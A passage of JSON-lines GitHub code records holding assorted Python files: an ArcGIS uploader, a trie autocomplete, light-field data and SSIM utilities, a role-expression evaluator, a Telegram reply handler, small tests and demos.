pruned_target_sequences.tolist()\n output_sequences = output_sequences.tolist()\n\n metrics = all_metrics_scores(True, target_sequences,\n pruned_target_sequences, output_sequences)\n return metrics['exact_match']","repo_name":"thepurpleowl/nips-gpt","sub_path":"cubert_spanprediction.py","file_name":"cubert_spanprediction.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30519888130","text":"import os\nimport json\nimport arcgis\nfrom arcgis.gis import GIS\nimport arcgis.features\nimport pandas as pd\nfrom arcgis.features import FeatureLayerCollection\n\ndef main():\n\tprint(\"Starting upload\")\n\tgis = GIS(\"home\")\n\n\tprint(\"Violence Dashboard\")\n\tfeature_layer_item = gis.content.search(\"025115e9685b4cc6ae886d72864dc001\")[0]\n\tprint(feature_layer_item)\n\tflayers = feature_layer_item.tables\n\tflayer = flayers[0]\n\tflayer.manager.truncate()\n\tdata_file_location = r'C:\\Users\\hchapman\\OneDrive - Jackson County Missouri\\Documents\\Dashboards\\Violence Dashboard - v2.0\\CombinedShootingDataV2.csv'\n\tflayerNew = FeatureLayerCollection.fromitem(feature_layer_item)\n\tflayerNew.manager.overwrite(data_file_location)\n\n\tprint(\"Violence Dashboard - Map\")\n\tfeature_layer_item = gis.content.search(\"786f36a3059d4129b7778d6646966905\")[0]\n\tprint(feature_layer_item)\n\tflayers = feature_layer_item.layers\n\tflayer = flayers[0]\n\tflayer.manager.truncate()\n\tdata_file_location = r'C:\\Users\\hchapman\\OneDrive - Jackson County Missouri\\Documents\\Dashboards\\Violence Dashboard - v2.0\\ShootingMapV2.csv'\n\tflayerNew = FeatureLayerCollection.fromitem(feature_layer_item)\n\tflayerNew.manager.overwrite(data_file_location)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"HenryFChapman/ViolenceDashboard","sub_path":"DataUploader.py","file_name":"DataUploader.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15556158033","text":"from images import Images\nfrom databases import Databases\nfrom PIL import Image\n\n\ndef main():\n command = input(\"Please select an image number(1 or 2):\")\n if command == \"1\":\n while True:\n image_1 = Images(\"image_1.png\", \"RGB\", 500, 500, \"white\")\n try:\n image_1.draw_on_image_version_1(database, 500, 500)\n except RuntimeError:\n continue\n else:\n image_1.save_image()\n img = Image.open('image_1.png')\n img.show()\n break\n elif command == \"2\":\n while True:\n image_2 = Images(\"image_2.png\", \"RGB\", 500, 500, \"black\")\n try:\n image_2.draw_on_image_version_2(database, 500, 500)\n except RuntimeError:\n continue\n else:\n image_2.save_image()\n img = Image.open('image_2.png')\n img.show()\n break\n else:\n print(\"Not a valid number\")\n\n\ndatabase = Databases(\"admin_data.csv\", \"base_data.sql\")\ntry:\n database.connect_db()\nexcept ConnectionError:\n print(\"Uh oh, can't connect. 
Invalid dbname, user or password?\")\nelse:\n    main()\n","repo_name":"CodecoolBP20161/python-data-visualisation-empty_and_the","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"1480084589","text":"# http://www.pythonchallenge.com/pc/def/channel.html\n\nimport zipfile, re\n\n\n\n\nf = zipfile.ZipFile(\"channel.zip\")\nprint(f.comment.decode(\"utf-8\"))\nnum = '90052'\nwhile True:\n    content = f.read(num + \".txt\").decode(\"utf-8\")\n    print(f.getinfo(num + \".txt\").comment.decode(\"utf-8\"),end='')\n    #print(content)\n    match = re.search(r\"Next nothing is (\\d+)\", content)\n    if match is None:\n        break\n    num = match.group(1)\n\n\n    # HOCKEY\n","repo_name":"eriksylvan/PythonChallange","sub_path":"6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73965208760","text":"from collections import defaultdict\nfrom heapq import heappush, heappop\nfrom typing import List\n\nclass TrieNode:\n    def __init__(self):\n        self.children = defaultdict(TrieNode)\n        self.count = defaultdict(int)\n\nclass AutocompleteSystem:\n\n    def __init__(self, sentences: List[str], times: List[int]):\n        self.root = TrieNode()\n        self.current_search_term = ''\n        self.curr_root = self.root\n        for i, sentence in enumerate(sentences):\n            self.add(sentence, times[i])\n    \n    def add(self, sentence, count):\n        curr = self.root\n        for char in sentence:\n            curr = curr.children[char] # 1. \n        curr.count[sentence] += count # 2.\n    \n    def input(self, c: str) -> List[str]:\n        search_results = []\n        heap = []\n        k = 3\n        if c == '#':\n            self.add(self.current_search_term, 1)\n            self.current_search_term = ''\n            self.curr_root = self.root\n            return []\n        self.current_search_term += c\n        self.curr_root = self.curr_root.children[c]\n        for sentence, count in self.curr_root.count.items():\n            heappush(heap, (-count, sentence))\n        while heap and k:\n            count, sentence = heappop(heap)\n            search_results.append(sentence)\n            k -= 1\n        return search_results\n\n'''\n1. Assigns the current char as the child of the current object.\n2. 
Increment the count on the children and not on the current node.\n'''\n","repo_name":"csusb-005411285/CodeBreakersCode","sub_path":"design-search-autocomplete-system.py","file_name":"design-search-autocomplete-system.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"3736018272","text":"import tables\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom torch.autograd import Variable\nimport torchvision as tv\nimport random\nimport h5py\nfrom math import exp\nimport os\nimport sys\nimport argparse\nclass Dataset(object):\n    def __init__(self, fname, randomSeed=None, img_indices=None, fov=None, \\\n        neighShape=1, keep_imgs=False, random_imgs=False, center_region=None, get_full_imgs=False):\n        self.fname = fname\n        self.tables = tables.open_file(self.fname, \"r\")#, driver=\"H5FD_CORE\")\n        self.neighShape = neighShape\n        self.LFShape = self.tables.root.LFData.shape\n        self.volShape = self.tables.root.volData.shape\n        self.tilesPerImage = self.LFShape[2:4]\n        self.keep_imgs = keep_imgs\n        self.nPatchesPerImg = self.tilesPerImage[0]*self.tilesPerImage[1]\n        self.randomSeed = randomSeed\n        self.nImagesInDB = self.LFShape[-1]\n        self.getFullImgs = get_full_imgs\n        if fov is None:\n            fov = 9\n        self.fov = fov\n        self.nDepths = self.volShape[2]\n        if randomSeed is not None:\n            torch.manual_seed(randomSeed)\n        self.centerRegion = center_region\n\n        # Defines ranges to use across each dimension\n        LF_ix_y = list(range(0,self.LFShape[2]))\n        LF_ix_x = list(range(0,self.LFShape[3]))\n        vol_ix_y = list(range(0,self.volShape[0]))\n        vol_ix_x = list(range(0,self.volShape[1]))\n\n        # If a center region of the images is desired, crop\n        if center_region is not None:\n            LF_ix_y = list(range(self.LFShape[2]//2-center_region//2,self.LFShape[2]//2+center_region//2))\n            LF_ix_x = list(range(self.LFShape[3]//2-center_region//2,self.LFShape[3]//2+center_region//2))\n            vol_ix_y = list(range(self.volShape[0]//2-(center_region*self.LFShape[0])//2,self.volShape[0]//2+(center_region*self.LFShape[0])//2))\n            vol_ix_x = list(range(self.volShape[1]//2-(center_region*self.LFShape[1])//2,self.volShape[1]//2+(center_region*self.LFShape[1])//2))\n            self.tilesPerImage = [center_region, center_region]\n            self.nPatchesPerImg = self.tilesPerImage[0]*self.tilesPerImage[1]\n            self.LFShape = tuple([self.LFShape[0],self.LFShape[1],center_region, center_region,self.LFShape[-1]])\n            self.volShape = tuple([self.LFShape[0]*center_region, self.LFShape[1]*center_region, self.volShape[-2], self.volShape[-1]])\n\n        self.LFSideLenght = fov + neighShape - 1\n        self.VolSideLength = self.neighShape * self.LFShape[0]\n\n        # Use images either suggested by user or all images\n        if img_indices is None:\n            self.img_indices = range(0,self.nImagesInDB)\n        else:\n            self.img_indices = img_indices\n        \n        # Randomize images\n        if random_imgs:\n            self.img_indices = torch.randperm(int(self.nImagesInDB))\n\n        self.nImagesToUse = len(self.img_indices)\n\n        self.nPatches = self.nPatchesPerImg * (self.nImagesToUse)\n\n        # Compute padding\n        fov_half = self.fov//2\n        if self.getFullImgs:\n            neighShapeHalf = self.neighShape//2\n            startOffset = fov_half\n            paddedLFSize = self.LFShape[:2] + tuple([self.LFShape[2]+2*startOffset,self.LFShape[3]+2*startOffset])\n            paddedVolSize = self.volShape[0:3]\n        else:\n            neighShapeHalf = self.neighShape//2\n            startOffset = fov_half + neighShapeHalf\n            paddedLFSize = self.LFShape[:2] + 
tuple([self.LFShape[2]+2*startOffset,self.LFShape[3]+2*startOffset])\n paddedVolSize = tuple([self.volShape[0]+2*neighShapeHalf*self.LFShape[0],self.volShape[1]+2*neighShapeHalf*self.LFShape[1],self.volShape[2]])\n \n self.LFFull = torch.zeros(paddedLFSize+tuple([self.nImagesToUse]),dtype=torch.uint8)\n self.VolFull = torch.zeros(paddedVolSize+tuple([self.nImagesToUse]),dtype=torch.uint8)\n\n \n print(\"Loading img: \",end=' ')\n for nImg,imgIx in enumerate(self.img_indices):\n print(str(imgIx),end=' ')\n # Load data from database\n currLF = torch.tensor(self.tables.root.LFData[:,:,:,:,imgIx], dtype=torch.uint8)\n currVol = torch.tensor(self.tables.root.volData[:,:,:,imgIx], dtype=torch.uint8)\n currLF = currLF[:,:,LF_ix_y,:]\n currLF = currLF[:,:,:,LF_ix_x]\n currVol = currVol[vol_ix_y,:,:]\n currVol = currVol[:,vol_ix_x,:]\n # Pad with zeros borders\n currLF = F.pad(currLF, (startOffset, startOffset, startOffset, startOffset, 0, 0, 0, 0))\n if self.getFullImgs==False:\n currVol = F.pad(currVol, (0,0,neighShapeHalf*self.LFShape[1],neighShapeHalf*self.LFShape[1],\\\n neighShapeHalf*self.LFShape[0],neighShapeHalf*self.LFShape[0]))\n self.LFFull[:,:,:,:,nImg] = currLF\n self.VolFull[:,:,:,nImg] = currVol\n \n self.volMax = self.VolFull.max()\n self.LFMax = self.LFFull.max()\n self.VolDims = [neighShape*self.LFShape[0],neighShape*self.LFShape[1],self.volShape[2]]\n self.LFDims = [self.LFShape[0],self.LFShape[1],self.LFSideLenght,self.LFSideLenght]\n\n if self.getFullImgs:\n self.VolDims = self.volShape[0:3]\n self.LFDims = self.LFShape[0:4]\n self.nPatches = len(self.img_indices)\n self.tables.close()\n\n def __getitem__(self, index):\n # Fetch full image or patches\n if self.getFullImgs:\n currLFPatch = self.LFFull[:,:,:,:, index].unsqueeze(0)\n currVolPatch = self.VolFull[:,:,:, index].unsqueeze(0)\n else:\n nImg = index//self.nPatchesPerImg\n nPatch = index - nImg*self.nPatchesPerImg\n yLF = nPatch//self.LFShape[3]\n xLF = nPatch%self.LFShape[3]\n yVol = yLF*self.LFShape[0]\n xVol = xLF*self.LFShape[1]\n\n # Crop current patch\n currLFPatch = self.LFFull[:,:,yLF:yLF+self.LFSideLenght, xLF:xLF+self.LFSideLenght, nImg].unsqueeze(0)\n currVolPatch = self.VolFull[yVol:yVol+self.VolSideLength, xVol:xVol+self.VolSideLength,:, nImg].unsqueeze(0)\n \n return currLFPatch, currVolPatch\n\n def __len__(self):\n return self.nPatches\n\n def get_n_depths(self):\n return self.VolDims[-1]\n def get_max(self):\n return self.LFMax, self.volMax\n def __shape__(self):\n return self.VolDims, self.LFDims\n \ndef convert3Dto2DTiles(x, lateralTile):\n nDepths = x.shape[-1]\n volSides = x.shape[-3:-1]\n nChans = x.shape[1]\n verticalTile = x.permute(0, 1, 4, 2, 3).contiguous().view(-1, nChans, volSides[0]*nDepths, volSides[1])\n currPred = verticalTile[:,:,0:volSides[0]*lateralTile[0],:]\n for k in range(1,lateralTile[1]):\n currPred = torch.cat((currPred, verticalTile[:,:,(lateralTile[0]*volSides[0]*k):(lateralTile[0]*volSides[0]*(k+1)),:]), dim=3)\n return currPred\n\ndef convert4Dto3DTiles(x, lateralTile):\n nDepths = x.shape[-1]\n volSide = x.shape[-2]\n nSamples = x.shape[0]\n verticalTile = x.permute(1,0,2,3).contiguous().view(volSide,volSide*nSamples,nDepths)\n currPred = verticalTile[:,0:volSide*lateralTile[0],:]\n for k in range(1,lateralTile[1]):\n currPred = torch.cat((currPred, verticalTile[:,(lateralTile[0]*volSide*k):(lateralTile[0]*volSide*(k+1)),:]), dim=0)\n return currPred\n\ndef LF2Spatial(xIn, LFSize):\n xShape = xIn.shape\n x = xIn\n if xIn.ndimension() == 6:\n x = 
xIn.permute((0,1,4,2,5,3)).contiguous().view(xShape[0], xShape[1], LFSize[0] * LFSize[2], LFSize[1] * LFSize[3])\n if xIn.ndimension() == 4:\n x = xIn.view(xShape[0],xShape[1],LFSize[2],LFSize[0],LFSize[3],LFSize[1]).permute((0,1,3,5,2,4)).contiguous()\n return x\n\ndef LF2Angular(xIn, LFSize):\n xShape = xIn.shape\n x = xIn\n if xIn.ndimension() == 6:\n x = xIn.permute((0,1,2,4,3,5)).contiguous().view(xShape[0], xShape[1], LFSize[0] * LFSize[2], LFSize[1] * LFSize[3])\n if xIn.ndimension() == 4:\n x = xIn.view(xShape[0],xShape[1],LFSize[0],LFSize[2],LFSize[1],LFSize[3]).permute((0,1,2,4,3,5)).contiguous()\n return x\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n nn.init.constant_(m.weight.data, 1/len(m.weight.data))\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.constant_(m.weight.data, 1/len(m.weight.data))\n\ndef getThreads():\n if sys.platform == 'win32':\n return (int)(os.environ['NUMBER_OF_PROCESSORS'])\n else:\n return (int)(os.popen('grep -c cores /proc/cpuinfo').read())\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef imadjust(x,a,b,c,d,gamma=1):\n # Similar to imadjust in MATLAB.\n # Converts an image range from [a,b] to [c,d].\n # The Equation of a line can be used for this transformation:\n # y=((d-c)/(b-a))*(x-a)+c\n # However, it is better to use a more generalized equation:\n # y=((x-a)/(b-a))^gamma*(d-c)+c\n # If gamma is equal to 1, then the line equation is used.\n # When gamma is not equal to 1, then the transformation is not linear.\n\n y = (((x - a) / (b - a)) ** gamma) * (d - c) + c\n mask = (y>0).float()\n y = torch.mul(y,mask)\n return y\n\n\n\n\n######## SSIM\n\ndef gaussian(window_size, sigma):\n gauss = torch.Tensor([exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])\n return gauss/gauss.sum()\n\ndef create_window(window_size, channel):\n _1D_window = gaussian(window_size, 1.5).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)\n window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())\n return window\n\ndef _ssim(img1, img2, window, window_size, channel, size_average = True):\n mu1 = F.conv2d(img1, window, padding = window_size//2, groups = channel)\n mu2 = F.conv2d(img2, window, padding = window_size//2, groups = channel)\n\n mu1_sq = mu1.pow(2)\n mu2_sq = mu2.pow(2)\n mu1_mu2 = mu1*mu2\n\n sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channel) - mu1_sq\n sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channel) - mu2_sq\n sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channel) - mu1_mu2\n\n C1 = 0.01**2\n C2 = 0.03**2\n\n ssim_map = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*(sigma1_sq + sigma2_sq + C2))\n\n if size_average:\n return ssim_map.mean()\n else:\n return ssim_map.mean(1).mean(1).mean(1)\n\nclass SSIM(torch.nn.Module):\n def __init__(self, window_size = 11, size_average = True):\n super(SSIM, self).__init__()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = create_window(window_size, self.channel)\n\n def forward(self, img1, img2):\n (_, channel, _, _) = img1.size()\n\n if channel == self.channel and self.window.data.type() == img1.data.type():\n window = self.window\n else:\n 
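# cache miss: the stored window does not match this input's channel count or dtype, so rebuild it\n            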
window = create_window(self.window_size, channel)\n            \n            if img1.is_cuda:\n                window = window.cuda(img1.get_device())\n            window = window.type_as(img1)\n            \n            self.window = window\n            self.channel = channel\n\n\n        return _ssim(img1, img2, window, self.window_size, channel, self.size_average)\n\ndef ssim(img1, img2, window_size = 11, size_average = True):\n    (_, channel, _, _) = img1.size()\n    window = create_window(window_size, channel)\n    \n    if img1.is_cuda:\n        window = window.cuda(img1.get_device())\n    window = window.type_as(img1)\n    \n    return _ssim(img1, img2, window, window_size, channel, size_average)","repo_name":"pvjosue/LFMNet","sub_path":"util/LFUtil.py","file_name":"LFUtil.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"}
+{"seq_id":"71215353081","text":"from src.modules.get_schedule.app.get_schedule_usecase import GetScheduleUsecase\nfrom src.shared.infra.repositories.answer_repository_mock import AnswerRepositoryMock\n\n\nclass Test_GetScheduleUsecase:\n    def test_get_schedule_usecase(self):\n        repo = AnswerRepositoryMock()\n        usecase = GetScheduleUsecase(repo)\n        \n        schedule = usecase()\n        \n        assert schedule.url == 'https://www.google.com'\n    ","repo_name":"Lucasdvs10/Projeto-Integrador-2023.2","sub_path":"tests/modules/get_schedule/app/test_get_schedule_usecase.py","file_name":"test_get_schedule_usecase.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"71826235960","text":"from threading import Thread, current_thread, Lock\n\nnum = 0\nlock = Lock()\n\n\ndef calc():\n    print('child thread %s start' % current_thread().name)\n    global num\n    for _ in range(10000):\n        # acquire the lock\n        lock.acquire()\n        num += 1\n        # release the lock\n        lock.release()\n    print('child thread %s end' % current_thread().name)\n\n\nif __name__ == '__main__':\n    print('parent thread %s start' % current_thread().name)\n    threads = []\n    for i in range(5):\n        threads.append(Thread(target=calc))\n        threads[i].start()\n    for i in range(5):\n        threads[i].join()\n    print('global num:', num)\n    print('parent thread %s end' % current_thread().name)\n","repo_name":"xtawfnhdx/PythonBaseStudy","sub_path":"08 进程线程和协程/082线程2.py","file_name":"082线程2.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"38199932277","text":"from .geometry import *\n\nclass Mesh:\n \"\"\"This is a 1D mesh analogous to a more conventional 2D or 3D mesh.\n \"\"\"\n\n def __init__(self, p0, p1, nSamples):\n self.p0 = p0\n self.p1 = p1\n d = 1 / (nSamples - 1) # spacing between vertices\n self.samplePoints = []\n for i in range(nSamples):\n t = i * d\n p = self.p0 + t * (self.p1 - self.p0)\n self.samplePoints.append(p)\n\n def line(self):\n \"\"\"returns the line the wall intersects\n\n it returns (p0, n) where p0 is an arbitrary point on the line and n is\n a normal to the the line, which is defined by n . (p - p0) = 0 for any\n point p on the line.\n \"\"\"\n return lineThroughPoints(self.p0, self.p1)\n\n def intersectsRay(self, ray):\n \"\"\"returns true iff ray intersects the wall\n \"\"\"\n return ray.intersectsLineSegment(self.p0, self.p1)\n","repo_name":"EllenAPorter/ExScRaTr","sub_path":"src/lmprop/lmprop/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14018812183","text":"import enum\nimport itertools\nfrom collections import deque\n\n\nclass TokenType(enum.Enum):\n \"\"\"Expression token type enum\"\"\"\n\n SYMBOL = 0\n LOGIC_AND = 1\n LOGIC_OR = 2\n LOGIC_NOT = 3\n L_PARANTHESIS = 4\n R_PARANTHESIS = 5\n\n\n#: Expression token dictionary to simplify code a bit\nTokenDic = {\n \"&\": TokenType.LOGIC_AND,\n \"|\": TokenType.LOGIC_OR,\n \"!\": TokenType.LOGIC_NOT,\n \"(\": TokenType.L_PARANTHESIS,\n}\n\n\n#: Precedence value dictionary for postfix conversion\nPrecedence = {\n TokenType.LOGIC_NOT: 20,\n TokenType.LOGIC_AND: 11,\n TokenType.LOGIC_OR: 10,\n TokenType.SYMBOL: 0,\n TokenType.L_PARANTHESIS: 0,\n TokenType.R_PARANTHESIS: 0,\n}\n\n\nclass ExpressionToken:\n \"\"\"Expression token representation\"\"\"\n\n type = -1\n value = \"\"\n\n def __init__(self, type, value):\n self.type = type\n self.value = value\n\n\nclass MetaRoleEvaluator:\n #: Dictionary for symbol evaluation\n dictionary = {}\n\n def __init__(self, role_dict: dict):\n self.dictionary = role_dict\n\n def tokenize(self, in_str):\n \"\"\"Tokenize the input string\"\"\"\n tokens = []\n # Remove whitespace\n in_str = \"\".join(in_str.split())\n # If the first character is not a symbol name start or '!' 
or\n # '(' we have an invalid expression\n if not (in_str[0].isdigit() or in_str[0] == \"!\" or in_str[0] == \"(\"):\n raise Exception(\"Invalid syntax at 0\")\n i = 0\n while i < len(in_str):\n # Symbol name must start with a digit (Discord role ID)\n if in_str[i].isdigit():\n symbol = \"\".join(itertools.takewhile(lambda x: x.isdigit(), in_str[i:]))\n i += len(symbol) - 1\n tokens.append(ExpressionToken(TokenType.SYMBOL, symbol))\n elif (in_str[i] == \"&\" and in_str[i + 1] == \"&\") or (\n in_str[i] == \"|\" and in_str[i + 1] == \"|\"\n ):\n i += 1\n # If no next char or next char is r_paranthesis - invalid syntax\n if i + 1 >= len(in_str) or in_str[i + 1] == \")\":\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenDic[in_str[i]], 0))\n elif in_str[i] == \"!\" or in_str[i] == \"(\":\n # For unary operations and left paranthesis\n # if previous token is a symbol or r_paranthesis - invalid syntax\n if tokens and (\n tokens[-1].type == TokenType.SYMBOL\n or tokens[-1].type == TokenType.R_PARANTHESIS\n ):\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenDic[in_str[i]], 0))\n elif in_str[i] == \")\":\n # Empty paranthesis\n if tokens and tokens[-1].type == TokenType.L_PARANTHESIS:\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenType.R_PARANTHESIS, 0))\n else:\n raise Exception(\"Illegal token {} at {}\".format(in_str[i], i))\n i += 1\n return tokens\n\n def convert_to_postfix(self, tokens):\n \"\"\"Convert tokenized expression to postfix form\"\"\"\n stack = deque()\n output = []\n for token in tokens:\n if token.type == TokenType.LOGIC_AND or token.type == TokenType.LOGIC_OR:\n if stack:\n minPrecedence = Precedence[token.type]\n while Precedence[stack[-1].type] >= minPrecedence:\n output.append(stack.pop())\n if not stack:\n break\n stack.append(token)\n elif token.type == TokenType.SYMBOL:\n output.append(token)\n elif token.type == TokenType.LOGIC_NOT:\n stack.append(token)\n elif token.type == TokenType.L_PARANTHESIS:\n stack.append(token)\n elif token.type == TokenType.R_PARANTHESIS:\n if not stack:\n raise Exception(\"Missing parenthesis\")\n while stack[-1].type != TokenType.L_PARANTHESIS:\n output.append(stack.pop())\n if not stack:\n raise Exception(\"Missing parenthesis\")\n stack.pop()\n if not stack:\n return output\n if stack[-1].type == TokenType.L_PARANTHESIS:\n raise Exception(\"Missing parenthesis\")\n while stack:\n output.append(stack.pop())\n return output\n\n def evaluate_symbol(self, symbol):\n \"\"\"Evaluate the symbol\"\"\"\n if symbol not in self.dictionary:\n raise Exception(\"Symbol {} doesn't exist.\".format(symbol))\n return self.dictionary[symbol]\n\n def evaluate(self, in_str):\n \"\"\"Evaluate string expression\"\"\"\n if not in_str:\n raise Exception(\"Empty expression string\")\n tokens = self.convert_to_postfix(self.tokenize(in_str))\n stack = deque()\n result = False\n for token in tokens:\n if token.type == TokenType.LOGIC_NOT:\n rightOperand = stack.pop()\n result = not rightOperand\n stack.append(result)\n elif token.type == TokenType.LOGIC_AND:\n rightOperand = stack.pop()\n leftOperand = stack.pop()\n result = leftOperand and rightOperand\n stack.append(result)\n elif token.type == TokenType.LOGIC_OR:\n rightOperand = stack.pop()\n leftOperand = stack.pop()\n result = leftOperand or rightOperand\n stack.append(result)\n elif token.type == TokenType.SYMBOL:\n stack.append(self.evaluate_symbol(token.value))\n return 
stack.pop()\n","repo_name":"SciADV-Community/rosetta","sub_path":"src/rosetta/utils/role_expr.py","file_name":"role_expr.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15915299927","text":"\r\n''' \r\nCompute the tax for a given amount, interest rate and purpose.\r\n\r\nArgs: \r\n    amount: amount of money to calculate tax\r\n    interest: interest rate to be applied on amount\r\n    purpose: purpose for which tax was applied\r\n\r\nReturns:\r\n    dict with the keys: amount, interest, tax, purpose.\r\n\r\nRaises:\r\n    TypeError for wrong arg types\r\n'''\r\n\r\ndef calculateTax(amount, interest, purpose) :\r\n    if not isinstance(amount, (int, float)) : \r\n        raise TypeError(\"Must be float or int\") \r\n    if not isinstance(interest, (int, float)) : \r\n        raise TypeError(\"Must be float or int\")\r\n    \r\n    tax = amount * (interest/100)\r\n    result = { \r\n    \"amount\" : amount, \r\n    \"interest\": interest, \r\n    \"tax\" : tax, \r\n    \"purpose\" : purpose}\r\n    return result\r\n    \r\n\r\n# - used dict for better visibility and understanding of the values\r\n# - the possibility to use any key separately and add more values\r\n\r\n\r\n","repo_name":"marianaterintii/calculateTax","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30310097872","text":"from unittest.mock import patch\nfrom io import StringIO\nimport unittest\nfrom console import HBNBCommand\n\nclass TestHBNBCommand(unittest.TestCase):\n    def setUp(self):\n        self.cmd = HBNBCommand()\n\n    def tearDown(self):\n        self.cmd = None\n\n    def test_help(self):\n        \"\"\"Test the functionality of the help command\"\"\"\n        with patch(\"sys.stdout\", new=StringIO()) as f:\n            HBNBCommand().onecmd(\"help\")\n        output = \"\"\"\nDocumented commands (type help <topic>):\n========================================\nEOF  help  quit\n\n\n        \"\"\"\n\n        self.assertEqual(output.strip(), f.getvalue().strip())\n\n    def test_help_EOF(self):\n        \"\"\"Test the functionality of the help EOF command\n        \"\"\"\n        with patch(\"sys.stdout\", new=StringIO()) as f:\n            HBNBCommand().onecmd(\"help EOF\")\n        output = \"\"\"Handles End Of File character\\n\n            \"\"\"\n        self.assertEqual(output.strip(), f.getvalue().strip())\n\n\n    def test_help_quit(self):\n        \"\"\"Test the functionality of the help quit command\"\"\"\n        with patch(\"sys.stdout\", new=StringIO()) as f:\n            HBNBCommand().onecmd(\"help quit\")\n        output = \"\"\"Quit command to exit the program \\n\n            \"\"\"\n        self.assertEqual(output.strip(), f.getvalue().strip())\n\n    def test_emptyline(self):\n        \"\"\"Test the functionality of emptyline\n        \"\"\"\n        with patch(\"sys.stdout\", new=StringIO()) as f:\n            HBNBCommand().onecmd(\"emptyline\")\n        output = \"\"\"*** Unknown syntax: emptyline\"\"\"\n        self.assertEqual(output.strip(), f.getvalue().strip())\n\nif __name__ == '__main__':\n    unittest.main()\n\n","repo_name":"Chukwunonso10/AirBnB_clone","sub_path":"tests/testconsole.py","file_name":"testconsole.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40382832303","text":"from telebot.async_telebot import AsyncTeleBot\nfrom telebot.types import Message\nfrom telebot.asyncio_helper import ApiTelegramException\nfrom telebot import logger\n\nfrom tgbot.utils.extract_id import extract_id\n\nasync def admin_user(message: Message, bot: AsyncTeleBot):\n    \"\"\"\n    Send the message to 
the user.\n    \"\"\"\n    # Extract the username and ID from the message text\n    reply_message = message.reply_to_message\n    if reply_message is None:\n        await bot.reply_to(\n            message,\n            text='Please reply to a user\\'s message.'\n        )\n        return\n\n    text = reply_message.text or reply_message.caption\n    if text is None:\n        await bot.reply_to(\n            message,\n            text='The replied message does not contain any text or caption.'\n        )\n        return\n\n    username, user_id = extract_id(text)\n    if not user_id:\n        await bot.reply_to(\n            message,\n            text='Please reply to a user\\'s message.'\n        )\n        return\n\n    try:\n        # Send the message to the user\n        await bot.copy_message(\n            chat_id=user_id,\n            from_chat_id=message.chat.id,\n            message_id=message.message_id\n        )\n    except ApiTelegramException as e:\n        if 'blocked' in e.description:\n            await bot.reply_to(\n                message,\n                text='User has blocked the bot.'\n            )\n        else:\n            logger.error(e)\n","repo_name":"Laterport/Anonymous_chatbot-feedbackbot","sub_path":"tgbot/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38340371949","text":"from SpecData import SerializableSpecObjectsUtils\nfrom Logger import Logger\n\nclass constants(object):\n    specPath=\"\"\n    sourcePath=\"\"\n    rpmPath=\"\"\n    logPath=\"\"\n    dist=\"\"\n    buildNumber=\"0000000\"\n    releaseVersion=\"NNNnNNN\"\n    topDirPath=\"\"\n    specData=None\n    buildRootPath=\"/mnt\"\n    prevPublishRPMRepo=\"\"\n    pullsourcesConfig=\"\"\n    buildPatch=False\n    inputRPMSPath=\"\"\n    rpmCheck=False\n    sourceRpmPath=\"\"\n    noDepsPackageList=[\"texinfo\",\"bzip2\",\"gettext\",\"nspr\",\"xz\",\"bison\",\"openjdk\",\"go\"]\n\n    # These packages will be built first, as the build-core-toolchain stage\n    listCoreToolChainPackages=[\n        \"filesystem\",\n        \"linux-api-headers\",\n        \"glibc\",\n        \"zlib\",\n        \"file\",\n        \"binutils\",\n        \"gmp\",\n   